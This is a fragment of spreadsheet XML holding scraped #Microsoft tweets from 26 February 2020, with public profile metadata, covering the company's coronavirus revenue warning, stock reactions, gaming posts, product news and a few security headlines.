https://t.co/ERtMQ1PQXT
#tech #coronavirus #COVID19 #virus #CoronaOutbreak</t>
  </si>
  <si>
    <t>Wed Feb 26 23:49:52 +0000 2020</t>
  </si>
  <si>
    <t>Finished day 1 of the Blacks at #Microsoft (BAM) 2020 conference. We got super deep today and looking to get deeper tomorrow. #MicrosoftLife #Ilovemycompany https://t.co/Vv0dxkT69L</t>
  </si>
  <si>
    <t>{'id': 83600197, 'id_str': '83600197', 'name': 'Nikkia T. Carter', 'screen_name': 'ladygwenavear', 'location': 'Redmond, WA', 'description': '#Microsoft Worldwide #ModernWorkplace Strategy Tech Lead. Speaker/Author. @VFIOrg Advocate. Philanthropist. ðŸ’ž #TechforGood #SharePoint #M365 #MicrosoftLife', 'url': 'https://t.co/ne7LhcCkJj', 'entities': {'url': {'urls': [{'url': 'https://t.co/ne7LhcCkJj', 'expanded_url': 'http://www.linkedin.com/in/nikkiatcarter', 'display_url': 'linkedin.com/in/nikkiatcartâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1091, 'friends_count': 422, 'listed_count': 218, 'created_at': 'Mon Oct 19 13:34:24 +0000 2009', 'favourites_count': 3836, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19136,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'http://pbs.twimg.com/profile_images/849681117191983104/qZelHypg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/849681117191983104/qZelHypg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/83600197/1491414797',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</si>
  <si>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23:49:04 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft : Expects Personal Computing to Miss Target -- Update #Microsoft #Stock #MarketScreener https://t.co/iTMaPTa27T https://t.co/nh5PZG3nsF</t>
  </si>
  <si>
    <t>{'id': 102325185, 'id_str': '102325185', 'name': 'MarketScreener.com', 'screen_name': 'Market_Screener', 'location': '', 'description': 'Find all financials news in real time. Equities, Indexes, Commodities, Currencies, Analysis, Top &amp; Flop #MarketScreener', 'url': 'https://t.co/O2QH5VgwDT', 'entities': {'url': {'urls': [{'url': 'https://t.co/O2QH5VgwDT', 'expanded_url': 'http://www.marketscreener.com', 'display_url': 'marketscreener.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9763, 'friends_count': 80, 'listed_count': 1238, 'created_at': 'Wed Jan 06 09:33:43 +0000 2010', 'favourites_count': 288, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1888352,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'http://pbs.twimg.com/profile_images/1041668619531444225/DYWcRasA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041668619531444225/DYWcRasA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102325185/1550585065', 'profile_link_color': '288842',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</si>
  <si>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Wed Feb 26 23:48:43 +0000 2020</t>
  </si>
  <si>
    <t>Network automation: Get started the right way with Cisco CX https://t.co/CXVxfIbZf7
For more info: https://t.co/K7MbuKsCKg #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto https://t.co/zn4gZjEmRR</t>
  </si>
  <si>
    <t>Wed Feb 26 23:44:43 +0000 2020</t>
  </si>
  <si>
    <t>Can safely say this guy never battled me again from the opposite side of the map 
#halo #haloce #haloceanniversary #halo2 #halo2anniversary #halo3 #halo4 #halo5 #haloinfinite #haloreach #haloodst #halomcc #microsoft #bungie #343 #xboxone #gamer
https://t.co/W6XOj6fuZj</t>
  </si>
  <si>
    <t>{'id': 1232460869654609920, 'id_str': '1232460869654609920', 'name': 'MissCxXx', 'screen_name': 'MissCxXx1', 'location': 'Queensland, Australia', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Wed Feb 26 00:22:39 +0000 2020', 'favourites_count': 0,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'http://pbs.twimg.com/profile_images/1232461200614494208/1OMNRGA7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232461200614494208/1OMNRGA7_normal.jpg',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</si>
  <si>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23:43:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Xbox One S 500GB White Game System Console Model 1681  ( 58 Bids )   #Microsoft  #Xbox  https://t.co/fWdHQRTxlJ</t>
  </si>
  <si>
    <t>{'id': 1016987542112088066, 'id_str': '1016987542112088066', 'name': 'Toewgi.Heatxe', 'screen_name': 'heatxe', 'location': 'New York, USA', 'description': 'music sports news travel shopping', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 629, 'friends_count': 45, 'listed_count': 3, 'created_at': 'Wed Jul 11 10:08:19 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11231, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1016990723219050496/h-HiaaIe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1016990723219050496/h-HiaaIe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1016987542112088066/1531304657',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</si>
  <si>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23:42:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft says Windows and Surface businesses will miss expectations due to coronavirus https://t.co/nJtFnaStuI #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 23:40:08 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft says COVID-19 outbreak will hamper Surface, More Personal Computing unit https://t.co/ZfHfSIMHP2 #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 23:37:45 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft MVPs Hack For The Greater Good #MSMVP #WIMVP 
See: https://t.co/EAsa51kgjX</t>
  </si>
  <si>
    <t>Wed Feb 26 23:36:54 +0000 2020</t>
  </si>
  <si>
    <t>@Apple @Microsoft  @NatGeo whos gonna be the first one to@use this pic that I toook yesterday in the @NavajoTours #photography #photo #apple #Microsoft #NationalGeographic https://t.co/0myPB4x0xM</t>
  </si>
  <si>
    <t>{'id': 1008549585831198725, 'id_str': '1008549585831198725', 'name': 'John94campo', 'screen_name': 'john94campo', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 53, 'listed_count': 0, 'created_at': 'Mon Jun 18 03:18:53 +0000 2018', 'favourites_count': 607,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'http://pbs.twimg.com/profile_images/1008550380576227328/5Mze_B_E_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1008550380576227328/5Mze_B_E_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1008549585831198725/1529292198',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</si>
  <si>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23:30:49 +0000 2020</t>
  </si>
  <si>
    <t>Get ready to take down enemies with a vast array of weaponry and see cool graphics in Call of Duty Modern Warfare 3 https://t.co/TNzwpdFp2B #microsoft #xbox #xbox360 #gaming #fps https://t.co/hedDVzb7NN</t>
  </si>
  <si>
    <t>Wed Feb 26 23:29:20 +0000 2020</t>
  </si>
  <si>
    <t>Did you know the online version of many #Microsoft and #office tools has many of the same features as the desktop version?? The @T4L_DoE team's #PowerUp event in #CoffsHarbour is all about getting started with awesome #edtech tips and tricks for the classroom!! https://t.co/UxZdfQCoYG</t>
  </si>
  <si>
    <t>{'id': 67529483, 'id_str': '67529483', 'name': 'Joachim Cohen', 'screen_name': 'JoachimCohen123', 'location': 'Sydney, Australia', 'description': 'Striving to discover, share and inspire Innovation in Education across the NSW DoE and beyond. My tweets are my own thoughts.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4033, 'friends_count': 2291, 'listed_count': 339, 'created_at': 'Fri Aug 21 04:57:26 +0000 2009', 'favourites_count': 9952, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14398,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'http://pbs.twimg.com/profile_images/1459497197/Untitled_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1459497197/Untitled_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/67529483/1496259630',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</si>
  <si>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Feb 26 23:26:55 +0000 2020</t>
  </si>
  <si>
    <t>Man I miss astrophotography
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #marijuana #maryjane #cannabis #gamerguy #gamer #gamer4life #destinythegame #samsung... https://t.co/mHLiSY4ZNx</t>
  </si>
  <si>
    <t>Wed Feb 26 23:26:17 +0000 2020</t>
  </si>
  <si>
    <t>#tech sector to remain under pressure after #Microsoft downgraded expectation after #markets today. Weak #investors sentiment remains under threat with #coronavirus and downgrades. Still too early to jump in. #asx</t>
  </si>
  <si>
    <t>{'id': 1156509936630677504, 'id_str': '1156509936630677504', 'name': 'Aus Equity Flash', 'screen_name': 'EquityAus', 'location': 'Australia', 'description': 'Friends of investors sharing free knowledge. Disclaimer : Contributors may or may not hold stocks mentioned. Opinions only and not personal financial advice.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 264, 'friends_count': 17, 'listed_count': 4, 'created_at': 'Wed Jul 31 10:20:30 +0000 2019', 'favourites_count': 38, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2398, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1156528200836476928/WW6SZsJf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156528200836476928/WW6SZsJf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1156509936630677504/1564572312',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</si>
  <si>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23:24:39 +0000 2020</t>
  </si>
  <si>
    <t>@MSFTIssues Fix my damn Sandbox! Worked fine till I got a wonderful #Microsoft #Update!</t>
  </si>
  <si>
    <t>{'id': 1153626590196187136, 'id_str': '1153626590196187136', 'name': 'Larry', 'screen_name': 'Larry8369', 'location': '', 'description': 'Navy Veteran and 1st responder. Worked for Hewlett-Packard as a Systems Engineer and Technical Consultant.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 45, 'friends_count': 57, 'listed_count': 1, 'created_at': 'Tue Jul 23 11:23:07 +0000 2019', 'favourites_count': 2468, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 998, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1153626830567628805/8iwr5H8-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153626830567628805/8iwr5H8-_normal.jpg',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</si>
  <si>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23:23:29 +0000 2020</t>
  </si>
  <si>
    <t>Exciting #AzureGovMeetup tonight in #dc. #DevSecOps is an important implementation in every application and should be the standard. #Microsoft #devops #security #development https://t.co/p3rmShgEi2</t>
  </si>
  <si>
    <t>{'id': 839273166870437889, 'id_str': '839273166870437889', 'name': 'Chris Calso', 'screen_name': 'ChrisCalso', 'location': 'Washington, DC', 'description': '.NET developer @Microtech. Interested in Machine Learning and AI. I enjoy all things outdoors including scuba diving, snowboarding, hiking, and ðŸ§—\u200dâ™‚ï¸', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 375, 'listed_count': 3, 'created_at': 'Wed Mar 08 00:34:50 +0000 2017', 'favourites_count': 571, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1108,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'http://pbs.twimg.com/profile_images/839473249884917761/O761Uopr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/839473249884917761/O761Uopr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/839273166870437889/1488981032',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</si>
  <si>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23:21:47 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft edge and all microsoft site's and page's have issues and bad browsing</t>
  </si>
  <si>
    <t>Wed Feb 26 23:19:58 +0000 2020</t>
  </si>
  <si>
    <t>One Of The Largest US #Tech #Stocks Warns On #Earnings Due To The Virus - #Microsoft Slides After Cutting Personal Computing Guidance Due To Coronavirus; Intel Dragged Lower. https://t.co/ajR6sXN3X9 https://t.co/6PVAE3jjpe</t>
  </si>
  <si>
    <t>{'id': 775905636005445632, 'id_str': '775905636005445632', 'name': 'Crush The Market', 'screen_name': 'crushthemarket', 'location': 'Sydney, New South Wales', 'description': 'Momentum Trend Following Trader &amp; Value Investor - ASX Stocks', 'url': 'https://t.co/XnemCNwr3O', 'entities': {'url': {'urls': [{'url': 'https://t.co/XnemCNwr3O', 'expanded_url': 'http://www.crushthemarket.com', 'display_url': 'crushthemarket.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2867, 'friends_count': 391, 'listed_count': 92, 'created_at': 'Wed Sep 14 03:54:54 +0000 2016', 'favourites_count': 12895, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 17202, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1103192605364371461/Tt1VA_sV_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1103192605364371461/Tt1VA_sV_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/775905636005445632/1473826603',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</si>
  <si>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23:18:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has released a video to promote the #Office Mobile all in one app for #Apple and #Android.  Its big on fancy graphics but almost no useful information. #iPhone #Office365 #OfficeMobile https://t.co/AOqwBQgUox</t>
  </si>
  <si>
    <t>Wed Feb 26 23:14:15 +0000 2020</t>
  </si>
  <si>
    <t>#USMarket struggling to hold positive and turned negative into the end of the session. #Microsoft downgraded after #markets and that drove futures lower. #coronavirus is the big risk and it's spreading into a number of countries with very weak health systems. #investors #asx</t>
  </si>
  <si>
    <t>Wed Feb 26 23:13:44 +0000 2020</t>
  </si>
  <si>
    <t>Played absolutely insane today with the boys @Ramen_2_Go @Matzaking  and got blessed with these viewers #Mixer #streamer #Apex #ApexLedgends #Xbox #XboxOne #twitch #Microsoft #GFUEL https://t.co/pgCYv0W5JK</t>
  </si>
  <si>
    <t>Wed Feb 26 23:13:25 +0000 2020</t>
  </si>
  <si>
    <t>Dow futures fall after #Microsoft issues coronavirus warning, #Trump news conference ahead https://t.co/YjqQGu2RNG</t>
  </si>
  <si>
    <t>{'id': 66001531, 'id_str': '66001531', 'name': 'Shane Nicholson', 'screen_name': 'Shamoism', 'location': 'Calgary, AB', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 97, 'friends_count': 449, 'listed_count': 6, 'created_at': 'Sat Aug 15 23:27:01 +0000 2009', 'favourites_count': 1064, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4566,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'http://pbs.twimg.com/profile_images/1457955498/baby_screaming_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1457955498/baby_screaming_normal.jpg',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</si>
  <si>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23:11:05 +0000 2020</t>
  </si>
  <si>
    <t>Hackers Scanning for Vulnerable #Microsoft Exchange Servers, Patch Now!
https://t.co/nZ2Eqij5eh https://t.co/md4jpzuZAe</t>
  </si>
  <si>
    <t>Wed Feb 26 23:11:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to soon reveal Universal Print, a #cloud-based print infrastructure service that eliminates Print Servers - https://t.co/dP9PLkIS3d https://t.co/0qzdueGO33</t>
  </si>
  <si>
    <t>Wed Feb 26 23:10:08 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft says Windows and Surface businesses will miss expectations due to coronavirus https://t.co/503sdyDSmK https://t.co/rSZHSU4ljE</t>
  </si>
  <si>
    <t>Wed Feb 26 23:05:01 +0000 2020</t>
  </si>
  <si>
    <t>#Google #Microsoft find a new reason to move production out of China https://t.co/BIjRs6q0UR</t>
  </si>
  <si>
    <t>{'id': 16417526, 'id_str': '16417526', 'name': 'PhoneArena', 'screen_name': 'phonearena', 'location': '', 'description': 'PhoneArena is the ultimate source for phones - the latest news, in-depth professional reviews, and huge phone specifications database!', 'url': 'http://t.co/3c2vND1rlY', 'entities': {'url': {'urls': [{'url': 'http://t.co/3c2vND1rlY', 'expanded_url': 'http://www.phonearena.com', 'display_url': 'phonearena.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 68726, 'friends_count': 16, 'listed_count': 1846, 'created_at': 'Tue Sep 23 10:27:14 +0000 2008', 'favourites_count': 99, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 109628, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EDF7FC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/866972016229965824/swUXQzNK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/866972016229965824/swUXQzNK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16417526/1544707888', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFBE56', 'profile_sidebar_fill_color': 'FFEBCB', 'profile_text_color': '0F1014', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 23:04:14 +0000 2020</t>
  </si>
  <si>
    <t>Institutions with paper-intensive tasks and onsite servers are especially prone to data loss and cyber attacks. Follow us to stay updated on how to protect your organization with #Microsoft. https://t.co/qk9ilZWd3y</t>
  </si>
  <si>
    <t>Wed Feb 26 23:03:13 +0000 2020</t>
  </si>
  <si>
    <t>Former Microsoft engineer convicted of 18 felonies for digital currency fraud scam | ZDNet https://t.co/YYX7lEZirb #digital #currency #cryptocurrency #fraud #Microsoft #engineer</t>
  </si>
  <si>
    <t>Wed Feb 26 23:02:12 +0000 2020</t>
  </si>
  <si>
    <t>Infrastructure + Security: Noteworthy News (February, 2020) https://t.co/NNFD95Znmh #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Feb 26 23:01:54 +0000 2020</t>
  </si>
  <si>
    <t>Upcoming changes to the Azure AD sign-in experience https://t.co/31DRSJjlVS #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Feb 26 23:01:32 +0000 2020</t>
  </si>
  <si>
    <t>Getting started with FSLogix profile containers on Azure Files in Windows Virtual Desktop https://t.co/nEQkpdaisU #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Feb 26 23:01:08 +0000 2020</t>
  </si>
  <si>
    <t>Benefit from Resource Provider registration when self-installing SQL Server on Azure Virtual Machine https://t.co/1Qsx2YWZFp #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Feb 26 23:01:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Community Events! Great landing page.
https://t.co/O8TtoNaCj7
#Microsoft #Community #Events #Session #Learning https://t.co/67fUy53pFv</t>
  </si>
  <si>
    <t>Wed Feb 26 23:00:23 +0000 2020</t>
  </si>
  <si>
    <t>Releasing Windows 10 Insider Preview Build 19041.84 to WSUS https://t.co/476AntHbef #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Feb 26 23:00:18 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft announced that Mexico will get its first cloud datacenter region as part of the company's ambitious Innovate for Mexico plan.
#AI #AIImpact #Microsoft #Mexico #cloud #Datacenter #AIPowered #InnovateforMexico #BigData #IoT #cloudcomputing 
Source: The Tesseract Academy https://t.co/GNLFH2nM5u</t>
  </si>
  <si>
    <t>Wed Feb 26 23:00:02 +0000 2020</t>
  </si>
  <si>
    <t>Plug and play NB-IoT solution targets high volume, low cost applications and includes native support for #Microsoft #Azure #IoT https://t.co/6yz2sPBDJj</t>
  </si>
  <si>
    <t>Wed Feb 26 22:59:13 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 22:58:16 +0000 2020</t>
  </si>
  <si>
    <t>Im looking for computer advice.  Does anyone know if Microsoft One Drive personal vault is secure enough to store banking info, passwords, etc?
#oneDrive
#Microsoft 
#CloudComputing</t>
  </si>
  <si>
    <t>{'id': 979951643943895040, 'id_str': '979951643943895040', 'name': 'Pea Eye', 'screen_name': 'PeaEye1', 'location': '', 'description': "A government big enough to give you everything you want is big enough to take everything you've ever had!\n#MAGA #KAG #KAG2020 #MAGA2020", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 10800, 'friends_count': 11200, 'listed_count': 4, 'created_at': 'Sat Mar 31 05:20:53 +0000 2018', 'favourites_count': 3832, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7628, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/979955743356080130/8L5ZoAOG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/979955743356080130/8L5ZoAOG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/979951643943895040/1522474629',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</si>
  <si>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22:56:19 +0000 2020</t>
  </si>
  <si>
    <t>I really love the new update on my #XboxOneX, smooth, clear and everything under control. Great job guys. #XGP #Microsoft https://t.co/cFGgtS0F7p</t>
  </si>
  <si>
    <t>{'id': 196199317, 'id_str': '196199317', 'name': 'Andreas Constantin', 'screen_name': 'ConstantinidisA', 'location': 'Boston , NY ', 'description': 'â™’ Boston 2 Greece, NE Patriots ðŸ‡ºðŸ‡¸, Les Grecs GK, Tech lover, Gamer, GlitchesGR founder, @joystickgr1 partner,  Vegan, LOVE Animals, STOP ANIMAL CRUELTY.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1421, 'friends_count': 1165, 'listed_count': 41, 'created_at': 'Tue Sep 28 15:25:49 +0000 2010', 'favourites_count': 30976, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 29106, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F6E2C7', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/477020276685676544/53v1ZHqF_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/477020276685676544/53v1ZHqF_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/196199317/1434323528', 'profile_link_color': '69565A', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '342115', 'profile_text_color': '814F31', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 22:54:14 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft warns that Windows revenue won't meet its expectations due to Covid-19 #Microsoft #Windows10 #Covid19: https://t.co/JZ8mkNOXPF via @NeowinFeed</t>
  </si>
  <si>
    <t>Wed Feb 26 22:53:12 +0000 2020</t>
  </si>
  <si>
    <t>OneNote for Android updated with dark mode support and other improvements #MIcrosoft #OneNote #Darkmode: https://t.co/LpfuF0DXlU via @NeowinFeed</t>
  </si>
  <si>
    <t>Wed Feb 26 22:50:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will never win the #search engine wars by forcing people to use Bing https://t.co/ExtMcVctTk #TechJunkieNews https://t.co/240ayWqTPX</t>
  </si>
  <si>
    <t>Wed Feb 26 22:49:34 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Credit Card Skimmer Uses Fake CDNs To Evade Detection:" https://t.co/VjFi6WP2jG
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Feb 26 22:49:22 +0000 2020</t>
  </si>
  <si>
    <t>Knee jerk much? #Microsoft says will not meet Q3 2020 More Personal Computing guidance because of #CoronavirusOutbreak  https://t.co/Zvn3oRIE8X</t>
  </si>
  <si>
    <t>{'id': 1219626031042191370, 'id_str': '1219626031042191370', 'name': 'Florida Bachelor Parties', 'screen_name': 'FLBachelorParty', 'location': 'South Florida', 'description': 'Full service #BachelorParty Plannerâ€”We plan parties in #Miami &amp; #FortLauderdale ðŸ¸ðŸ´ðŸŒï¸ðŸ', 'url': 'https://t.co/RvbKAN0pPC', 'entities': {'url': {'urls': [{'url': 'https://t.co/RvbKAN0pPC', 'expanded_url': 'https://www.flbachelorparties.com', 'display_url': 'flbachelorparties.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 28, 'listed_count': 0, 'created_at': 'Tue Jan 21 14:21:43 +0000 2020', 'favourites_count': 35, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 104, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1219628631430967297/kUhIVvXj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219628631430967297/kUhIVvXj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1219626031042191370/1579616817',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</si>
  <si>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22:49:15 +0000 2020</t>
  </si>
  <si>
    <t>Attackers probing for vulnerable Microsoft Exchange Servers, is yours one of them? - Help Net Security
#msexchange #CyberSecurity #microsoft #sysadmin #itpro  https://t.co/ffOQxr5Ciz</t>
  </si>
  <si>
    <t>{'id': 17017011, 'id_str': '17017011', 'name': '| Adnan Rafique |', 'screen_name': 'imentorcloud', 'location': 'New Jersey, USA', 'description': '#mentor #career #office365 #infosec #AI #office365 #azure #grc | Office MVP 206-2019', 'url': 'https://t.co/mQoPIKueUO', 'entities': {'url': {'urls': [{'url': 'https://t.co/mQoPIKueUO', 'expanded_url': 'http://iMentorCloud.com', 'display_url': 'iMentorCloud.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 788, 'friends_count': 788, 'listed_count': 98, 'created_at': 'Tue Oct 28 06:54:53 +0000 2008', 'favourites_count': 474, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3555, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1218291353932746756/TBaM4kRv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218291353932746756/TBaM4kRv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17017011/1519654494',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</si>
  <si>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22:48:16 +0000 2020</t>
  </si>
  <si>
    <t>Dont get knocked off your feet just yet! Were halfway to the weekend!
.
#airassault #anvilstation #halo #haloreach #halocosplay #xbox #xbox360 #xboxonex #microsoft #xboxone #343industries #bungie #cosplay #cosplayersofinstagram #evafoam #foamarmor #foa... https://t.co/Qj7COlbG7S https://t.co/82GeUjg1Pq</t>
  </si>
  <si>
    <t>Wed Feb 26 22:47:29 +0000 2020</t>
  </si>
  <si>
    <t>SharePoint - SSL Offloading https://t.co/Bb93lw2LfC #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 22:47:23 +0000 2020</t>
  </si>
  <si>
    <t>#Review of Project #xCloud  https://t.co/GpL0mmPSW5
#Microsoft</t>
  </si>
  <si>
